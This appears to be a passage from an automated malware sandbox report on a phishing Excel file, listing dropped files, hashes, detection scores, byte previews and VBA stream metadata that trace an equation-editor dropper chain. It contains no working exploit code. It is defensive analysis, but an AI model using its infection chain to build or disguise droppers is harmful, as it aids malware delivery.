                                              SHA-512:2BF53BB29C684C2D54ADEA3D1877A31DF011A9B58EDCF54FCE697291BEC9056591BB3BDE95DC05BC1A3474A721B2889E4312903479782823F0606BD32B4243E5
                                              Malicious:false
                                              Reputation:low
                                              Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):4056
                                              Entropy (8bit):1.929653848333741
                                              Encrypted:false
                                              SSDEEP:12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
                                              MD5:4A103FC1809C8EA381D2ACB5380EF4F6
                                              SHA1:6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
                                              SHA-256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
                                              SHA-512:77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):321644
                                              Entropy (8bit):2.239527826723405
                                              Encrypted:false
                                              SSDEEP:768:2DONBmwaWFloY6jKV8g5d1KnK1LXMpaCnwSOybdY0p:mONIwaWFlajKpk6LXMpVTT
                                              MD5:35F7C4CEEC52F37D0B0881CCC3A7612D
                                              SHA1:3FC1E0B485071C1725703E6CB1029485B895765F
                                              SHA-256:17918DE803C9609AB1D8BF011FC75835E43FF490299D7D67EAB7F550E1FC0968
                                              SHA-512:ACE05DA7132DEEBF169C45D3C726B34B8DEE745F00109ABED41B6A6A4D6AE2DD1010AAD7C4FC08DA96335C33D4B6D7A49A24E2621812D15D6FEA584CEE34156B
                                              Malicious:false
                                              Preview:....l...............m............J..sK.. EMF....l...8...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................{.......%...........%...........R...p................................@."C.a.l.i.b.r.i......................................................x$....._..f.x.@..%....._..._.....l._..._.RQ.Rl._.d._......._.P._.$Q.Rl._.d._. ...Id.xd._.l._. ............d.x................................@1......%...X...%...7...................{$..................C.a.l.i.b.r.i.......,._....x..y.._..._..8.x........dv......%...........%...........%...................................!.......................{......."...........%...........%...........%...........T...T..........................@.E.@....n.......L...............{.......P... ...6...F...........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):17500
                                              Entropy (8bit):2.2724443756862973
                                              Encrypted:false
                                              SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/aP2iGGWWWZmCI8bMGBvWbkmIg:d0kMc4
                                              MD5:831E92F84F915D931EE02260D16AC145
                                              SHA1:51C81E34BEBE02A91EA7DA9F275E9EFD72547D01
                                              SHA-256:C4CAD71039044EFBE493BD54FD3A00FB9C35FF9CC8BA47F668490A3803378594
                                              SHA-512:E85B4B468A2E9F76CCAD6CFFEC6478138046B0F335C6409D7F0849A4755D4C57477FE587624AD8EF418AA829B79183C975EF2858B3052022686BC812DC974C78
                                              Malicious:false
                                              Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):321644
                                              Entropy (8bit):2.239527826723405
                                              Encrypted:false
                                              SSDEEP:768:2DONBmwaWFloY6jKV8g5d1KnK1LXMpaCnwSOybdY0p:mONIwaWFlajKpk6LXMpVTT
                                              MD5:35F7C4CEEC52F37D0B0881CCC3A7612D
                                              SHA1:3FC1E0B485071C1725703E6CB1029485B895765F
                                              SHA-256:17918DE803C9609AB1D8BF011FC75835E43FF490299D7D67EAB7F550E1FC0968
                                              SHA-512:ACE05DA7132DEEBF169C45D3C726B34B8DEE745F00109ABED41B6A6A4D6AE2DD1010AAD7C4FC08DA96335C33D4B6D7A49A24E2621812D15D6FEA584CEE34156B
                                              Malicious:false
                                              Preview:....l...............m............J..sK.. EMF....l...8...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................{.......%...........%...........R...p................................@."C.a.l.i.b.r.i......................................................x$....._..f.x.@..%....._..._.....l._..._.RQ.Rl._.d._......._.P._.$Q.Rl._.d._. ...Id.xd._.l._. ............d.x................................@1......%...X...%...7...................{$..................C.a.l.i.b.r.i.......,._....x..y.._..._..8.x........dv......%...........%...........%...................................!.......................{......."...........%...........%...........%...........T...T..........................@.E.@....n.......L...............{.......P... ...6...F...........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):17500
                                              Entropy (8bit):2.2754571047715912
                                              Encrypted:false
                                              SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/uf2iGGWWWZmCI8bUaBvWbkmIg:d0EUI4
                                              MD5:38A09794AE082E08EA4F8B6E517F4814
                                              SHA1:8B7DF3EE701A7E43BBD9A1AC03A7C342FDB4F2B5
                                              SHA-256:22A5F86B243A131E89E06FF0FA824A09369D1878DC1F1C4E3527FFDDBEFF70F3
                                              SHA-512:2BF53BB29C684C2D54ADEA3D1877A31DF011A9B58EDCF54FCE697291BEC9056591BB3BDE95DC05BC1A3474A721B2889E4312903479782823F0606BD32B4243E5
                                              Malicious:false
                                              Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):17500
                                              Entropy (8bit):2.2724443756862973
                                              Encrypted:false
                                              SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/aP2iGGWWWZmCI8bMGBvWbkmIg:d0kMc4
                                              MD5:831E92F84F915D931EE02260D16AC145
                                              SHA1:51C81E34BEBE02A91EA7DA9F275E9EFD72547D01
                                              SHA-256:C4CAD71039044EFBE493BD54FD3A00FB9C35FF9CC8BA47F668490A3803378594
                                              SHA-512:E85B4B468A2E9F76CCAD6CFFEC6478138046B0F335C6409D7F0849A4755D4C57477FE587624AD8EF418AA829B79183C975EF2858B3052022686BC812DC974C78
                                              Malicious:false
                                              Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):11776
                                              Entropy (8bit):5.656065698421856
                                              Encrypted:false
                                              SSDEEP:192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
                                              MD5:17ED1C86BD67E78ADE4712BE48A7D2BD
                                              SHA1:1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
                                              SHA-256:BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
                                              SHA-512:0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 2%
                                              Joe Sandbox View:
                                              • Filename: Services_Jingce_Quotation28112022.exe, Detection: malicious, Browse
                                              • Filename: Services_Jingce_Quotation28112022.exe, Detection: malicious, Browse
                                              • Filename: 98765434567890.exe, Detection: malicious, Browse
                                              • Filename: 98765434567890.exe, Detection: malicious, Browse
                                              • Filename: ORI-0876543200987 (1).exe, Detection: malicious, Browse
                                              • Filename: DC-098432345678909 (2).exe, Detection: malicious, Browse
                                              • Filename: ORI-0876543200987 (1).exe, Detection: malicious, Browse
                                              • Filename: DC-098432345678909 (2).exe, Detection: malicious, Browse
                                              • Filename: , Detection: malicious, Browse
                                              • Filename: uWoMvSzdog.exe, Detection: malicious, Browse
                                              • Filename: uWoMvSzdog.exe, Detection: malicious, Browse
                                              • Filename: RFQ.exe, Detection: malicious, Browse
                                              • Filename: RFQ.exe, Detection: malicious, Browse
                                              • Filename: 21831nRdnc.exe, Detection: malicious, Browse
                                              • Filename: 21831nRdnc.exe, Detection: malicious, Browse
                                              • Filename: RFQ1258966.xls, Detection: malicious, Browse
                                              • Filename: Factura.exe, Detection: malicious, Browse
                                              • Filename: Factura.exe, Detection: malicious, Browse
                                              • Filename: Qoute for 04261LOMO-01418-LALIZAS UAE.exe, Detection: malicious, Browse
                                              • Filename: Qoute for 04261LOMO-01418-LALIZAS UAE.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 29 05:27:07 2022, Security: 1
                                              Category:dropped
                                              Size (bytes):1130496
                                              Entropy (8bit):7.090671625727551
                                              Encrypted:false
                                              SSDEEP:24576:mLsr5XXXXXXXXXXXXUXXXXXXXSXXXXXXXXzmZr5XXXXXXXXXXXXUXXXXXXXSXXXd:Ch
                                              MD5:0E013B64C85479178FE144D0F1AB7C4B
                                              SHA1:D05316B326B2DA075C00246DE6E3CBFB8B255A96
                                              SHA-256:CAB79276FB8419A70BAAC774C9DB91D16ED1DADF5F5624C4148E7F1975FDFF94
                                              SHA-512:34699E3C80C5F5E95C876D5794E05701C1726E04A46AF9976CB6415551688B97F39DFC78556F4F7A0588B4E24111663F7BAC1D188E80F256BAE5821BAFCCE5B0
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:......................>...............................................................m...n...\...]...^...............................n.......p...........................................................................................................................................................................................................................................................................................................................................................................................H...............................................................................................i...Z........... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):178824
                                              Entropy (8bit):6.515135274289935
                                              Encrypted:false
                                              SSDEEP:1536:Aqnh3ZWvlivpBh2LolEVEF+F2MVQ454gp3cHE6xBiP29vpAX5D57DwVaDXW:RkYzh2Lol/FdUJNfPgk5DVDUd
                                              MD5:52F571D999E9DD5B6ABFFE0CC9BF8DF3
                                              SHA1:67743CD31368EA4C7C350C5071A6B1D8A5AF400B
                                              SHA-256:7CC58916DBEADFF389E9375FD1F8973DB606156E953F309C55C40384E54765E3
                                              SHA-512:0BA04B8CDA196099229824B65348B71483D50377D10660AF8CD70A10919A310D88DDBA80D1F595524F71764BB2A765C87B9E5E2276391B11A272A52E3BBA7C11
                                              Malicious:false
                                              Preview:...6.{..N..p2...H.=L.]......l..b.0..2).v..X..~..q..nm.9..$h....YZ..}..V.u..E.a(M..........q......@9.n.`7......z.N...<...&..h..\.....&.h@p.....%.~5._b..b........B(....:.4......t.S0..J..0.h.&..H.t.gV.&..y.,J.3...m..\.......~n..L.AnI.....C.a.7w^!9.D.]J.....p...C8..Hn.....14.|.. ...k........_9......@%......S..d.>.*I.9.@.....l.....,.4G.l.}..e....<......]...wj.Z.^...j.Fv.#..9n.c{.`..4U...,Q...v.g.t)..o...g......E.}..9...1....Wbl..JT%8..m[x.a.u.7.i)......1+..$l@...x$.~......6q.BE.x..7...n.n..gOZ.V.7..6.a!.c....`.vGm).."L#~..E......tV.....DjX.....Z.>..Z.).c...............D7}d.v.. ..%...v.fH.....Cw..x.^......b\ct....Y.*.g.b...1*cR..%6F'.......Q-.......GH....L!?1...<.^Rf.G.H[O.<.Ke.....R..._e..1..s........y.~..x!...Tl.... .a .;..KG.]%:."%.O..X.S..b..t.o{.......#..9...b..J.e..w...<~b........5................XC....Z....E.zE.g.k.X.^.=.W)...>.'K.h<.C\././.7.d......~./.a~.Yc.......4...{....d..m."...v........v"......iY....9..ka.....M...m.}).....Y..f..-..4..
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):119298
                                              Entropy (8bit):7.998253263209972
                                              Encrypted:true
                                              SSDEEP:1536:6JcdhM4/003cKP7zr9UE0q19q9MUxJ0O1mwVrLSft3KeDQMjE4le/l1NUYeECfZm:LdhM4/Fpb/1Ca2LEt9DQMA4lGVUh14B
                                              MD5:251C92F85825E5BBBE4D7624FC7F4AE4
                                              SHA1:BF396458B8D37DCC5880B29A7482A4896828C35F
                                              SHA-256:20694D441EEAB696B6D6AE5B7785BB0CAD19E1708EF49C28737CAD1805B49CDC
                                              SHA-512:5730DF53CE6DE9791F81287EA340ECDECEF1B99B80DC7501F9739083AF5D66543795E82C19388522580A43B8553FEAA2D5C0B419502BC7325E34F1862BBD44DD
                                              Malicious:false
                                              Preview:...Ct.m.j\i...G..@k......D.....W.S.CE.P'.O....9l....4Y%\.R...%..'.D.o.%9h........vP.h0...E_..1.}................{...).h....F.r..lm....D..{..dF4.@F..=.....G..&....... v47.L..V..%.$x..rK..ue=.w.)..+b...$.m.Gj..@x.3...14J...#"....G| v8@Y2.R..v.."j...~.,..<..}...&H9F..v..=....>;......HF..c...~..'c.f.p0"...>Q|./."...n..t.............$^.Z.c....h(.df.B..`,..#.?s.8..k'.B.t.....<3..s..h-).Q..\R.O.C=.c.<S..b(..Q#.....r...j..z...U.vU.>..C...@...G-..7=.....".mu52.[...`Bf}0q.V.lF.|(.pMo...^L.l.@.#[bH...1..I.l.Mi..iB..(N"$e.....r..9....1z.2..P.G*H..p....sE..O.cR.l.Z.H/.u_.Z+"Rk.M.g..q....Z..{0...*g....,:....t..QF2.oA.v{....h.....TIN...r.. O.u..P...(........G.....+kk%9W.b.I.Q.....Gy9^~./..Q8..!o]$.5.....4. };......80....ze.^l....WL.b....!..0.N.{Q...'.....I..dnP....7.p..aB.w.Z.v]R.../r.C6(q.C...%...n....2@..0$.X.;CW.1...5...s#.]..x[h..T./.>.(...dJ...q?._.I....K...1'....9.).n1#..5:&.S3^........Z.Z.0.c._.'.....r;bw.P.....K.^.....(....'..4.?....N....#.
                                              Process:C:\Users\Public\vbc.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                              Category:dropped
                                              Size (bytes):131991
                                              Entropy (8bit):5.8780987492725405
                                              Encrypted:false
                                              SSDEEP:1536:v6J1cdTEl2OzvUtevCuoCW9fPr+vo9F5J7YWv3vbRnBycYWOGWSeaGymtYWOGWSS:VdW2OLgNCwXKSH8WPvVBjA+KE8S5
                                              MD5:10D998CF80B4437C2979B25EBCBE16D1
                                              SHA1:79C99DD2ABB99253E41C5E40DAB29522F93345BB
                                              SHA-256:A0A87BC30F4B39D7B642841A10208CE5286C6CA712B28B9D921E1EA6F547AEE6
                                              SHA-512:44863645B48815C3C248111F86440E3A0C515AF61B5A17D15B5A6C7304277F76056BCEB6C579E7824E11ADCA4DB3E385FA8019D602C40FA527E725C09B6AA523
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"...%............P........................................@......g}....`... .................................................lE...........................0.............................. i..(....................................................text...X...........................`..`.data........ ......................@....rdata...A...0...B..................@..@.pdata...............R..............@..@.xdata..X............`..............@..@.bss....p................................edata...............n..............@..@.idata..lE.......F...p..............@....CRT....X...........................@....tls......... ......................@....reloc.......0......................@..B........................................................................................................................................................................
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):477800
                                              Entropy (8bit):7.505402259729816
                                              Encrypted:false
                                              SSDEEP:12288:Lz772qgvq2nLm4W2RPLKb+nFzIQ3Ja8TA:gXnS4W2RPLKm/of
                                              MD5:7081C4822CF1C7572DD82822B8F27C49
                                              SHA1:4EE3B6C423B1C9EBF5BEFBC73D1EEF0C576CF026
                                              SHA-256:B5330F82F3C5C3F223AE9DECD3EBDCD74D1A13D95B1C42BD7B2DE4E6C6CB0083
                                              SHA-512:6E3377E6A47518F2267CD38646E2CEC576D41FD8A67C8C2590F43BF353C0B1F322FC229E70BC98E9C7DFAA1A11CF872A0C8E2C15A31EE90EF1C4E65EAC98EE3A
                                              Malicious:true
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@..........................p............@.............................................h............5..X............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...0...............................rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 29 05:27:07 2022, Security: 1
                                              Entropy (8bit):7.090542873047565
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:ACP-2210825ORDER.xls
                                              File size:1130496
                                              MD5:6c84860292e2a4d210396b7012be9b8a
                                              SHA1:7061c26320bf8836b55ac660860fa0937ae8f48e
                                              SHA256:cadae8bf6a2bcf1ee630695a250a481d22d0b6d409832f60070b118dfc3bca75
                                              SHA512:dbeb30f6ec918e82c13ed2aea4f14eeba7a38252fda3ebba49b63b0840a529b026cb36c40927b69d95970fe83c0b09c957a5b918d124eff97bfeaf3cda77a426
                                              SSDEEP:24576:XLsr5XXXXXXXXXXXXUXXXXXXXSXXXXXXXXpmSr5XXXXXXXXXXXXUXXXXXXXSXXXZ:sh
                                              TLSH:1135BE347893CE36D9A586347BA6D5B103037C733E548A5722C3732E1AF334265D6EAA
                                              File Content Preview:........................>...............................................................m...n...\...]...^...............................n.......p..............................................................................................................
                                              Icon Hash:e4eea286a4b4bcb4
                                              Document Type:OLE
                                              Number of OLE Files:1
                                              Has Summary Info:
                                              Application Name:Microsoft Excel
                                              Encrypted Document:True
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:True
                                              Code Page:1252
                                              Author:
                                              Last Saved By:
                                              Create Time:2006-09-16 00:00:00
                                              Last Saved Time:2022-11-29 05:27:07
                                              Creating Application:
                                              Security:1
                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:786432
                                              General
                                              Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 15 f4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet1"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet2
                                              VBA File Name:Sheet2.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] & g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 26 67 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet2"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/Sheet3
                                              VBA File Name:Sheet3.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 1e 0d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet3"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:985
